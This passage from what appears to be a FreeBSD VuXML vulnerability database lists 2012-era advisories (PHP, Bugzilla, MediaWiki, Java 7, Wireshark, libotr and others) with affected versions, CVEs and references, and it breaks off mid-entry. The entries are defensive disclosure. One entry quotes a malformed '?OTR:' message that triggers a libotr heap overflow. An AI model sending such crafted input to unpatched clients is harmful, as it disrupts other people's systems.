<p>Rui Hirokawa reports:</p>
<blockquote cite="https://bugs.php.net/bug.php?id=60227">
<p>As of PHP 5.1.2, header() can no longer be used to send
multiple response headers in a single call to prevent the
HTTP Response Splitting Attack. header() only checks the
linefeed (LF, 0x0A) as line-end marker, it doesn't check the
carriage-return (CR, 0x0D).</p>
<p>However, some browsers including Google Chrome, IE also
recognize CR as the line-end.</p>
<p>The current specification of header() still has the
vulnerability against the HTTP header splitting attack.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-1398</cvename>
<url>https://bugs.php.net/bug.php?id=60227</url>
</references>
<dates>
<discovery>2011-11-06</discovery>
<entry>2012-09-05</entry>
<modified>2012-09-19</modified>
</dates>
</vuln>
<vuln vid="b50913ce-f4a7-11e1-b135-003067b2972c">
<topic>bitcoin -- denial of service</topic>
<affects>
<package>
<name>bitcoin</name>
<range><lt>0.6.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://bitcointalk.org/?topic=88734">
<p>An unspecified denial-of-service attack that could cause the
bitcoin process to become unresponsive was found.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3789</cvename>
<url>https://bitcointalk.org/?topic=88734</url>
</references>
<dates>
<discovery>2012-07-20</discovery>
<entry>2012-09-02</entry>
</dates>
</vuln>
<vuln vid="6ad18fe5-f469-11e1-920d-20cf30e32f6d">
<topic>bugzilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>bugzilla</name>
<range><ge>3.6.0</ge><lt>3.6.11</lt></range>
<range><ge>4.0.0</ge><lt>4.0.8</lt></range>
<range><ge>4.2.0</ge><lt>4.2.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>A Bugzilla Security Advisory reports:</p>
<blockquote cite="http://www.bugzilla.org/security/3.6.10/">
<p>The following security issues have been discovered in
Bugzilla:</p>
<h1>LDAP Injection</h1>
<p>When the user logs in using LDAP, the username is not
escaped when building the uid=$username filter which is
used to query the LDAP directory. This could potentially
lead to LDAP injection.</p>
<h1>Directory Browsing</h1>
<p>Extensions are not protected against directory browsing
and users can access the source code of the templates
which may contain sensitive data.
Directory browsing is blocked in Bugzilla 4.3.3 only,
because it requires a configuration change in the Apache
httpd.conf file to allow local .htaccess files to use
Options -Indexes. To not break existing installations,
this fix has not been backported to stable branches.
The access to templates is blocked for all supported
branches except the old 3.6 branch, because this branch
doesn't have .htaccess in the bzr repository and cannot
be fixed easily for existing installations without
potentially conflicting with custom changes.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3981</cvename>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=785470</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=785522</url>
<url>https://bugzilla.mozilla.org/show_bug.cgi?id=785511</url>
</references>
<dates>
<discovery>2012-08-30</discovery>
<entry>2012-09-01</entry>
</dates>
</vuln>
<vuln vid="342176a8-f464-11e1-8bd8-0022156e8794">
<topic>GNU gatekeeper -- denial of service</topic>
<affects>
<package>
<name>gatekeeper</name>
<range><lt>3.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jan Willamowius reports:</p>
<blockquote cite="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3534">
<p>GNU Gatekeeper before 3.1 does not limit the number
of connections to the status port, which allows remote
attackers to cause a denial of service (connection and
thread consumption) via a large number of connections.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3534</cvename>
<url>http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3534</url>
<url>http://www.openwall.com/lists/oss-security/2012/08/25/4</url>
<url>http://www.gnugk.org/gnugk-3.1.html</url>
</references>
<dates>
<discovery>2012-08-15</discovery>
<entry>2012-09-01</entry>
</dates>
</vuln>
<vuln vid="7c0fecd6-f42f-11e1-b17b-000c2977ec30">
<topic>mediawiki -- multiple vulnerabilities</topic>
<affects>
<package>
<name>mediawiki</name>
<range><ge>1.19</ge><lt>1.19.2</lt></range>
<range><ge>1.18</ge><lt>1.18.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mediawiki reports:</p>
<blockquote cite="http://lists.wikimedia.org/pipermail/mediawiki-announce/2012-August/000119.html">
<p>(Bug 39700) Wikipedia administrator Writ Keeper discovered
a stored XSS (HTML injection) vulnerability. This was
possible due to the handling of link text on File: links for
nonexistent files. MediaWiki 1.16 and later is affected.</p>
<p>(Bug 39180) User Fomafix reported several DOM-based XSS
vulnerabilities, made possible by a combination of loose
filtering of the uselang parameter, and JavaScript gadgets
on various language Wikipedias.</p>
<p>(Bug 39180) During internal review, it was discovered that
CSRF tokens, available via the api, were not protected with
X-Frame-Options headers. This could lead to a CSRF vulnerability
if the API response is embedded in an external website using
an iframe.</p>
<p>(Bug 39824) During internal review, it was discovered extensions
were not always allowed to prevent the account creation action.
This allowed users blocked by the GlobalBlocking extension to
create accounts.</p>
<p>(Bug 39184) During internal review, it was discovered that
password data was always saved to the local MediaWiki database
even if authentication was handled by an extension, such as LDAP.
This could allow a compromised MediaWiki installation to leak
information about users' LDAP passwords. Additionally, in situations
when an authentication plugin returned false in its strict
function, this would allow old passwords to be used for accounts
that did not exist in the external system, indefinitely.</p>
<p>(Bug 39823) During internal review, it was discovered that metadata
about blocks, hidden by a user with suppression rights, was visible
to administrators.</p>
</blockquote>
</body>
</description>
<references>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39700</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=37587</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39180</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39824</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39184</url>
<url>https://bugzilla.wikimedia.org/show_bug.cgi?id=39823</url>
<cvename>CVE-2012-4377</cvename>
<cvename>CVE-2012-4378</cvename>
<cvename>CVE-2012-4379</cvename>
<cvename>CVE-2012-4380</cvename>
<cvename>CVE-2012-4381</cvename>
<cvename>CVE-2012-4382</cvename>
</references>
<dates>
<discovery>2012-08-27</discovery>
<entry>2012-09-01</entry>
</dates>
</vuln>
<vuln vid="5415f1b3-f33d-11e1-8bd8-0022156e8794">
<topic>wireshark -- denial of service in DRDA dissector</topic>
<affects>
<package>
<name>wireshark</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
<package>
<name>wireshark-lite</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
<package>
<name>tshark</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
<package>
<name>tshark-lite</name>
<range><ge>1.5</ge><lt>1.8.2_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>RedHat security team reports:</p>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=849926">
<p>A denial of service flaw was found in the way Distributed
Relational Database Architecture (DRDA) dissector of
Wireshark, a network traffic analyzer, performed processing
of certain DRDA packet capture files. A remote attacker
could create a specially-crafted capture file that, when
opened, could lead the wireshark executable to consume an
excessive amount of CPU time and hang in an infinite
loop.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3548</cvename>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=849926</url>
</references>
<dates>
<discovery>2012-08-21</discovery>
<entry>2012-08-31</entry>
<modified>2012-09-05</modified>
</dates>
</vuln>
<vuln vid="4c53f007-f2ed-11e1-a215-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk</name>
<range><gt>10.*</gt><lt>10.7.1</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.15.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Asterisk Manager User Unauthorized Shell Access</p>
<p>ACL rules ignored when placing outbound calls by certain IAX2
users</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2186</cvename>
<cvename>CVE-2012-4737</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-012.html</url>
<url>http://downloads.digium.com/pub/security/AST-2012-013.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-08-30</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="2b8cad90-f289-11e1-a215-14dae9ebcf89">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>15.0,1</lt></range>
<range><lt>10.0.7,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.7,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.12</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.7</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.12</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>15.0</lt></range>
<range><lt>10.0.7</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-57 Miscellaneous memory safety hazards (rv:15.0/
rv:10.0.7)</p>
<p>MFSA 2012-58 Use-after-free issues found using Address
Sanitizer</p>
<p>MFSA 2012-59 Location object can be shadowed using
Object.defineProperty</p>
<p>MFSA 2012-60 Escalation of privilege through about:newtab</p>
<p>MFSA 2012-61 Memory corruption with bitmap format images with
negative height</p>
<p>MFSA 2012-62 WebGL use-after-free and memory corruption</p>
<p>MFSA 2012-63 SVG buffer overflow and use-after-free issues</p>
<p>MFSA 2012-64 Graphite 2 memory corruption</p>
<p>MFSA 2012-65 Out-of-bounds read in format-number in XSLT</p>
<p>MFSA 2012-66 HTTPMonitor extension allows for remote debugging
without explicit activation</p>
<p>MFSA 2012-67 Installer will launch incorrect executable following
new installation</p>
<p>MFSA 2012-68 DOMParser loads linked resources in extensions when
parsing text/html</p>
<p>MFSA 2012-69 Incorrect site SSL certificate data display</p>
<p>MFSA 2012-70 Location object security checks bypassed by chrome
code</p>
<p>MFSA 2012-71 Insecure use of __android_log_print</p>
<p>MFSA 2012-72 Web console eval capable of executing
chrome-privileged code</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1956</cvename>
<cvename>CVE-2012-1970</cvename>
<cvename>CVE-2012-1971</cvename>
<cvename>CVE-2012-1972</cvename>
<cvename>CVE-2012-1973</cvename>
<cvename>CVE-2012-1974</cvename>
<cvename>CVE-2012-1975</cvename>
<cvename>CVE-2012-1976</cvename>
<cvename>CVE-2012-3956</cvename>
<cvename>CVE-2012-3957</cvename>
<cvename>CVE-2012-3958</cvename>
<cvename>CVE-2012-3959</cvename>
<cvename>CVE-2012-3960</cvename>
<cvename>CVE-2012-3961</cvename>
<cvename>CVE-2012-3962</cvename>
<cvename>CVE-2012-3963</cvename>
<cvename>CVE-2012-3964</cvename>
<cvename>CVE-2012-3965</cvename>
<cvename>CVE-2012-3966</cvename>
<cvename>CVE-2012-3967</cvename>
<cvename>CVE-2012-3968</cvename>
<cvename>CVE-2012-3969</cvename>
<cvename>CVE-2012-3970</cvename>
<cvename>CVE-2012-3971</cvename>
<cvename>CVE-2012-3972</cvename>
<cvename>CVE-2012-3973</cvename>
<cvename>CVE-2012-3974</cvename>
<cvename>CVE-2012-3975</cvename>
<cvename>CVE-2012-3976</cvename>
<cvename>CVE-2012-3978</cvename>
<cvename>CVE-2012-3979</cvename>
<cvename>CVE-2012-3980</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-57.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-58.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-59.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-60.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-61.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-62.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-63.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-64.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-65.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-66.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-67.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-68.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-69.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-70.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-71.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-72.html</url>
</references>
<dates>
<discovery>2012-08-28</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="6dd5e45c-f084-11e1-8d0f-406186f3d89d">
<topic>coppermine -- Multiple vulnerabilities</topic>
<affects>
<package>
<name>coppermine</name>
<range><lt>1.5.20</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Coppermine Team reports:</p>
<blockquote cite="http://forum.coppermine-gallery.net/index.php/topic,74682.0.html">
<p>The release covers several path disclosure vulnerabilities. If
unpatched, it's possible to generate an error that will reveal the
full path of the script. A remote user can determine the full path
to the web root directory and other potentially sensitive
information. Furthermore, the release covers a recently discovered
XSS vulnerability that allows (if unpatched) a malevolent visitor to
include their own script routines under certain conditions.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1613</cvename>
<cvename>CVE-2012-1614</cvename>
<mlist>http://seclists.org/oss-sec/2012/q2/11</mlist>
<url>http://forum.coppermine-gallery.net/index.php/topic,74682.0.html</url>
</references>
<dates>
<discovery>2012-03-29</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="16846d1e-f1de-11e1-8bd8-0022156e8794">
<topic>Java 1.7 -- security manager bypass</topic>
<affects>
<package>
<name>openjdk</name>
<range><ge>7.0</ge><lt>7.6.24_1</lt></range>
</package>
<package>
<name>linux-sun-jdk</name>
<range><ge>7.0</ge><lt>7.7</lt></range>
</package>
<package>
<name>linux-sun-jre</name>
<range><ge>7.0</ge><lt>7.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>US-CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/636312">
<p>Oracle Java Runtime Environment (JRE) 1.7 contains a
vulnerability that may allow an applet to call
setSecurityManager in a way that allows setting of arbitrary
permissions.</p>
<p>By leveraging the public, privileged getField() function,
an untrusted Java applet can escalate its privileges by
calling the setSecurityManager() function to allow full
privileges, without requiring code signing.</p>
<p>This vulnerability is being actively exploited in the
wild, and exploit code is publicly available.</p>
</blockquote>
<p>This exploit does not only affect Java applets: every
piece of software that relies on the Java Security Manager for
sandboxing executable code is affected, since malicious code can
completely disable the Security Manager.</p>
</body>
</description>
<references>
<cvename>CVE-2012-4681</cvename>
<certvu>636312</certvu>
<url>http://www.deependresearch.org/2012/08/java-7-vulnerability-analysis.html</url>
<url>http://mail.openjdk.java.net/pipermail/distro-pkg-dev/2012-August/020065.html</url>
<url>http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html</url>
</references>
<dates>
<discovery>2012-08-27</discovery>
<entry>2012-08-30</entry>
<modified>2012-08-31</modified>
</dates>
</vuln>
<vuln vid="18ce9a90-f269-11e1-be53-080027ef73ec">
<topic>fetchmail -- chosen plaintext attack against SSL CBC initialization vectors</topic>
<affects>
<package>
<name>fetchmail</name>
<range><ge>6.3.9</ge><lt>6.3.22</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Matthias Andree reports:</p>
<blockquote cite="http://www.fetchmail.info/fetchmail-SA-2012-01.txt">
<p>Fetchmail version 6.3.9 enabled "all SSL workarounds" (SSL_OP_ALL)
which contains a switch to disable a countermeasure against certain
attacks against block ciphers that permit guessing the
initialization vectors, providing that an attacker can make the
application (fetchmail) encrypt some data for him -- which is not
easily the case.</p>
<p>Stream ciphers (such as RC4) are unaffected.</p>
<p>Credits to Apple Product Security for reporting this.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3389</cvename>
</references>
<dates>
<discovery>2012-01-19</discovery>
<entry>2012-08-30</entry>
</dates>
</vuln>
<vuln vid="c906e0a4-efa6-11e1-8fbf-001b77d09812">
<topic>roundcube -- cross-site scripting in HTML email messages</topic>
<affects>
<package>
<name>roundcube</name>
<range><ge>0.8.0,1</ge><lt>0.8.1,1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>RoundCube branch 0.8.x prior to version 0.8.1 is prone
to a cross-site scripting (XSS) attack originating from incoming
HTML e-mails: due to the lack of proper sanitization
of JavaScript code inside the "href" attribute, a sender
could launch an XSS attack when the recipient opens the message
in the RoundCube interface.</p>
</body>
</description>
<references>
<cvename>CVE-2012-3508</cvename>
<url>http://trac.roundcube.net/wiki/Changelog</url>
<url>http://trac.roundcube.net/ticket/1488613</url>
</references>
<dates>
<discovery>2012-08-14</discovery>
<entry>2012-08-27</entry>
</dates>
</vuln>
<vuln vid="aa4d3d73-ef17-11e1-b593-00269ef07d24">
<topic>Calligra, KOffice -- input validation failure</topic>
<affects>
<package>
<name>koffice</name>
<range><le>1.6.3_18,2</le></range>
</package>
<package>
<name>koffice-kde4</name>
<range><le>2.3.3_7</le></range>
</package>
<package>
<name>calligra</name>
<range><lt>2.5.0</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>KDE Security Advisory reports:</p>
<blockquote cite="http://www.kde.org/info/security/advisory-20120810-1.txt">
<p>A flaw has been found which can allow malicious code to take
advantage of an input validation failure in the Microsoft import
filter in Calligra and KOffice. Exploitation can allow the attacker
to gain control of the running process and execute code on its
behalf.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3455</cvename>
<cvename>CVE-2012-3456</cvename>
<url>http://www.kde.org/info/security/advisory-20120810-1.txt</url>
<url>http://media.blackhat.com/bh-us-12/Briefings/C_Miller/BH_US_12_Miller_NFC_attack_surface_WP.pdf</url>
</references>
<dates>
<discovery>2012-08-10</discovery>
<entry>2012-08-26</entry>
</dates>
</vuln>
<vuln vid="ce680f0a-eea6-11e1-8bd8-0022156e8794">
<topic>squidclamav -- cross-site scripting in default virus warning pages</topic>
<affects>
<package>
<name>squidclamav</name>
<range><lt>5.8</lt></range>
<range><ge>6.0</ge><lt>6.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>SquidClamav developers report:</p>
<blockquote cite="http://squidclamav.darold.net/news.html">
<p>This release fixes several security issues by escaping CGI
parameters.</p>
</blockquote>
<p>Prior to versions 6.7 and 5.8, the CGI script clwarn.cgi did not
properly sanitize its input variables, so they could be used to
inject arbitrary strings into the generated page, leading
to cross-site scripting attacks.</p>
</body>
</description>
<references>
<cvename>CVE-2012-4667</cvename>
<url>http://squidclamav.darold.net/news.html</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-08-25</entry>
</dates>
</vuln>
<vuln vid="8defa0f9-ee8a-11e1-8bd8-0022156e8794">
<topic>squidclamav -- Denial of Service</topic>
<affects>
<package>
<name>squidclamav</name>
<range><lt>5.7_1</lt></range>
<range><ge>6.0</ge><lt>6.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>SquidClamav developers report:</p>
<blockquote cite="http://squidclamav.darold.net/news.html">
<p>Add a workaround for a squidGuard bug that unescapes
the URL and sends it back unescaped. This results in garbage
staying in the pipe of the system command call and could crash
squidclamav on the next read or return false information.
This is especially true with URLs containing the %0D or %0A
character.</p>
</blockquote>
<p>This vulnerability can be triggered only in configurations
where an external chained URL checker is configured via the
"squidguard" directive.</p>
</body>
</description>
<references>
<cvename>CVE-2012-3501</cvename>
<url>http://squidclamav.darold.net/news.html</url>
</references>
<dates>
<discovery>2012-07-24</discovery>
<entry>2012-08-25</entry>
<modified>2012-09-04</modified>
</dates>
</vuln>
<vuln vid="a7975581-ee26-11e1-8bd8-0022156e8794">
<topic>inn -- plaintext command injection into encrypted channel</topic>
<affects>
<package>
<name>inn</name>
<range><lt>2.5.2_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>INN developers report:</p>
<blockquote cite="https://www.isc.org/software/inn/2.5.3article">
<p>Fixed a possible plaintext command injection during the
negotiation of a TLS layer. The vulnerability detailed
in CVE-2011-0411 affects the STARTTLS and AUTHINFO SASL
commands. nnrpd now resets its read buffer upon
a successful negotiation of a TLS layer. It prevents
malicious commands, sent unencrypted, from being executed
in the new encrypted state of the session.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3523</cvename>
<cvename>CVE-2011-0411</cvename>
<url>https://www.isc.org/software/inn/2.5.3article</url>
</references>
<dates>
<discovery>2012-08-14</discovery>
<entry>2012-08-25</entry>
</dates>
</vuln>
<vuln vid="4d1d2f6d-ec94-11e1-8bd8-0022156e8794">
<topic>jabberd -- domain spoofing in server dialback protocol</topic>
<affects>
<package>
<name>jabberd</name>
<range><lt>2.2.16_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>XMPP Standards Foundation reports:</p>
<blockquote cite="http://xmpp.org/resources/security-notices/server-dialback/">
<p>Some implementations of the XMPP Server Dialback protocol
(RFC 3920/XEP-0220) have not been checking dialback
responses to ensure that validated results are correlated
with requests.</p>
<p>An attacking server could spoof one or more domains in
communicating with a vulnerable server implementation,
thereby avoiding the protections built into the Server
Dialback protocol.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3525</cvename>
<url>http://xmpp.org/resources/security-notices/server-dialback/</url>
</references>
<dates>
<discovery>2012-08-21</discovery>
<entry>2012-08-23</entry>
</dates>
</vuln>
<vuln vid="a4598875-ec91-11e1-8bd8-0022156e8794">
<topic>rssh -- configuration restrictions bypass</topic>
<affects>
<package>
<name>rssh</name>
<range><lt>2.3.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Derek Martin (rssh maintainer) reports:</p>
<blockquote cite="http://www.pizzashack.org/rssh/security.shtml">
<p>John Barber reported a problem where, if the system
administrator misconfigures rssh by providing too few access
bits in the configuration file, the user will be given
default permissions (scp) to the entire system, potentially
circumventing any configured chroot. Fixing this required a
behavior change: in the past, using rssh without a config
file would give all users default access to use scp on an
unchrooted system. In order to correct the reported bug,
this feature has been eliminated, and you must now have a
valid configuration file. If no config file exists, all
users will be locked out.</p>
</blockquote>
</body>
</description>
<references>
<url>http://www.pizzashack.org/rssh/security.shtml</url>
</references>
<dates>
<discovery>2010-08-01</discovery>
<entry>2012-08-22</entry>
</dates>
</vuln>
<vuln vid="65b25acc-e63b-11e1-b81c-001b77d09812">
<topic>rssh -- arbitrary command execution</topic>
<affects>
<package>
<name>rssh</name>
<range><lt>2.3.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Derek Martin (rssh maintainer) reports:</p>
<blockquote cite="http://sourceforge.net/mailarchive/message.php?msg_id=29235647">
<p>Henrik Erkkonen has discovered that, through clever
manipulation of environment variables on the ssh command
line, it is possible to circumvent rssh. As far as I can
tell, there is no way to effect a root compromise, except of
course if the root account is the one you're attempting to
protect with rssh...</p>
</blockquote>
</body>
</description>
<references>
<bid>53430</bid>
<cvename>CVE-2012-3478</cvename>
<url>http://sourceforge.net/mailarchive/message.php?msg_id=29235647</url>
</references>
<dates>
<discovery>2012-05-08</discovery>
<entry>2012-08-22</entry>
</dates>
</vuln>
<vuln vid="c651c898-e90d-11e1-b230-0024e830109b">
<topic>libotr -- buffer overflows</topic>
<affects>
<package>
<name>libotr</name>
<range><lt>3.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OTR developers report:</p>
<blockquote cite="http://lists.cypherpunks.ca/pipermail/otr-dev/2012-July/001347.html">
<p>The otrl_base64_otr_decode() function and similar functions within OTR
suffer from buffer overflows in the case of malformed input;
specifically if a message of the format of "?OTR:===." is received
then a zero-byte allocation is performed without a similar correlation
between the subsequent base64 decoding write, as such it becomes
possible to write between zero and three bytes incorrectly to the
heap, albeit only with a value of '='.</p>
<p>Because this code path is highly utilized, specifically in the
reception of instant messages over pidgin or similar, this
vulnerability is considered severe even though in many platforms and
circumstances the bug would yield an unexploitable state and result
simply in denial of service.</p>
<p>The developers of OTR promptly fixed the errors and users of OTR are
advised to upgrade the software at the next release cycle.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3461</cvename>
<url>http://lists.cypherpunks.ca/pipermail/otr-dev/2012-July/001347.html</url>
</references>
<dates>
<discovery>2012-07-27</discovery>
<entry>2012-08-18</entry>
</dates>
</vuln>
<vuln vid="0f62be39-e8e0-11e1-bea0-002354ed89bc">
<topic>OpenTTD -- Denial of Service</topic>
<affects>
<package>
<name>openttd</name>
<range><le>1.2.1</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenTTD Team reports:</p>
<blockquote cite="http://security.openttd.org/en/CVE-2012-3436">
<p>Denial of service (server) using ships on half tiles and
landscaping.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3436</cvename>
<url>http://security.openttd.org/en/CVE-2012-3436</url>
</references>
<dates>
<discovery>2012-07-25</discovery>
<entry>2012-08-18</entry>
</dates>
</vuln>
<vuln vid="4cdfe875-e8d6-11e1-bea0-002354ed89bc">
<topic>Wireshark -- Multiple vulnerabilities</topic>
<affects>
<package>
<name>wireshark</name>
<range><lt>1.8.2</lt></range>
</package>
<package>
<name>wireshark-lite</name>
<range><lt>1.8.2</lt></range>
</package>
<package>
<name>tshark</name>
<range><lt>1.8.2</lt></range>
</package>
<package>
<name>tshark-lite</name>
<range><lt>1.8.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Wireshark reports:</p>
<blockquote cite="http://www.wireshark.org/docs/relnotes/wireshark-1.8.2.html">
<p>It may be possible to make Wireshark crash by injecting a
malformed packet onto the wire or by convincing someone to read a
malformed packet trace file.</p>
<p>It may be possible to make Wireshark consume excessive CPU
resources by injecting a malformed packet onto the wire or by
convincing someone to read a malformed packet trace file.</p>
<p>The PPP dissector could crash.</p>
<p>The NFS dissector could use excessive amounts of CPU.</p>
<p>The DCP ETSI dissector could trigger a zero division.</p>
<p>The MongoDB dissector could go into a large loop.</p>
<p>The XTP dissector could go into an infinite loop.</p>
<p>The ERF dissector could overflow a buffer.</p>
<p>The AFP dissector could go into a large loop.</p>
<p>The RTPS2 dissector could overflow a buffer.</p>
<p>The GSM RLC MAC dissector could overflow a buffer.</p>
<p>The CIP dissector could exhaust system memory.</p>
<p>The STUN dissector could crash.</p>
<p>The EtherCAT Mailbox dissector could abort.</p>
<p>The CTDB dissector could go into a large loop.</p>
<p>The pcap-ng file parser could trigger a zero division.</p>
<p>The Ixia IxVeriWave file parser could overflow a buffer.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-4048</cvename>
<cvename>CVE-2012-4049</cvename>
<cvename>CVE-2012-4285</cvename>
<cvename>CVE-2012-4286</cvename>
<cvename>CVE-2012-4287</cvename>
<cvename>CVE-2012-4288</cvename>
<cvename>CVE-2012-4289</cvename>
<cvename>CVE-2012-4290</cvename>
<cvename>CVE-2012-4291</cvename>
<cvename>CVE-2012-4292</cvename>
<cvename>CVE-2012-4293</cvename>
<cvename>CVE-2012-4294</cvename>
<cvename>CVE-2012-4295</cvename>
<cvename>CVE-2012-4296</cvename>
<cvename>CVE-2012-4297</cvename>
<cvename>CVE-2012-4298</cvename>
<url>http://www.wireshark.org/security/wnpa-sec-2012-11.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-12.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-13.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-14.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-15.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-16.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-17.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-18.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-19.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-20.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-21.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-22.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-23.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-24.html</url>
<url>http://www.wireshark.org/security/wnpa-sec-2012-25.html</url>
</references>
<dates>
<discovery>2012-07-22</discovery>
<entry>2012-08-18</entry>
</dates>
</vuln>
<vuln vid="07234e78-e899-11e1-b38d-0023ae8e59f0">
<topic>databases/postgresql*-server -- multiple vulnerabilities</topic>
<affects>
<package>
<name>postgresql-server</name>
<range><gt>8.3.*</gt><lt>8.3.20</lt></range>
<range><gt>8.4.*</gt><lt>8.4.13</lt></range>
<range><gt>9.0.*</gt><lt>9.0.9</lt></range>
